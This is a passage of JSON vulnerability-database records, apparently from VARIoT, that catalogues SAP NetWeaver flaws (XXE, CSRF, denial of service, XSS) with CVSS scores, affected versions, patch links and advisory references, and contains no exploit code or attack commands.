"data": "nwbc_ext2int in SAP NetWeaver Application Server before Security Note 2183189 allows XXE attacks for local file inclusion via the sap/bc/ui2/nwbc/nwbc_ext2int/ URI. SAP NetWeaver Application Server To XML There is a vulnerability in an external entity.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "VULMON",
"id": "CVE-2015-7968"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7968",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2015-7968",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"id": "VAR-202003-1193",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:18:21.029000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP ERP",
"trust": 0.8,
"url": "https://help.sap.com/viewer/product/sap_erp/6.04.20/en-us"
},
{
"title": "SAP NetWeaver Application Server Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=111650"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://labs.integrity.pt/advisories/cve-2015-7968/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7968"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7968"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/611.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-09T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"date": "2020-03-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"date": "2020-03-09T14:15:11.227000",
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"date": "2020-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-10T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"date": "2020-03-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"date": "2020-03-10T14:53:46.717000",
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"date": "2020-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server In XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
],
"trust": 0.6
}
}
var-201302-0413
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious actions in the target user context, such as executing shell commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0413",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "55107454-1f39-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious actions in the target user context, such as executing shell commands",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00692"
},
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-00692",
"trust": 0.8
},
{
"db": "IVD",
"id": "55107454-1F39-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"id": "VAR-201302-0413",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"last_update_date": "2022-05-17T02:09:07.310000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver MMC Request Patch for Forgery Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31380"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-12-051-sap-netweaver-mmc-csrf/http"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-04T00:00:00",
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00692"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver MMC Request forgery vulnerability",
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00692"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Permission permission and access control",
"sources": [
{
"db": "IVD",
"id": "55107454-1f39-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201402-0239
Vulnerability from variot
Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 3. The relevant DIR error input lacks filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. Multiple cross-site scripting vulnerabilities 3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0239",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1963"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, George Nosenko and Dmitry Chastukhin",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1963",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-1963",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01007",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-1963",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-206",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 3. The relevant DIR error input lacks filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including:\n1. An information-disclosure vulnerability\n2. Multiple cross-site scripting vulnerabilities\n3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1963",
"trust": 3.0
},
{
"db": "SECUNIA",
"id": "56947",
"trust": 1.6
},
{
"db": "BID",
"id": "65547",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"id": "VAR-201402-0239",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
],
"trust": 0.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
]
},
"last_update_date": "2023-12-18T13:39:58.097000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1773912",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver has multiple vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43676"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1963"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/56947"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1773912"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1963"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1963"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"date": "2014-02-14T15:55:07.533000",
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001413"
},
{
"date": "2018-12-10T19:29:03.810000",
"db": "NVD",
"id": "CVE-2014-1963"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-206"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Message Server Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001413"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
